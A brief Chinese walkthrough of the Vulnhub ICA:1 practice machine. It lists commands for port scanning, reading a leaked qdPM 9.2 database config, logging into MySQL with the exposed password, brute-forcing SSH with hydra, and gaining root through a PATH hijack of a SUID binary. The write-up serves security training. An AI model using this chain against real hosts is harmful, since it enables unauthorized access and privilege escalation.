Vulnhub: ICA:1靶机
kali:192.168.111.111
靶机:192.168.111.130
信息收集
端口扫描
nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.130
访问目标80,发现目标CMS为qdPM 9.2
搜索对应漏洞发现存在信息泄露
searchsploit qdpm
访问192.168.111.130/core/config/databases.yml
得到目标数据库账号密码
利用数据库中的账号密码爆破ssh
mysql -uqdpmadmin -pUcVQCMQk2STVeS6J -h192.168.111.130
hydra -L ./user.txt -P ./pass.txt 192.168.111.130 -s 22 ssh -t 64
提权
查找suid权限的文件
find / -perm -u=s 2> /dev/null
该程序执行的时候同时会执行cat命令
strings /opt/get_access
修改环境变量提权
echo 'cp /bin/bash /tmp/bash;chmod 4777 /tmp/bash' > /tmp/cat
chmod 777 /tmp/cat
export PATH=/tmp:$PATH
./get_access
/tmp/bash -p
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 分享4款.NET开源、免费、实用的商城系统
· 全程不用写代码,我用AI程序员写了一个飞机大战
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· 白话解读 Dapr 1.15:你的「微服务管家」又秀新绝活了
· 上周热点回顾(2.24-3.2)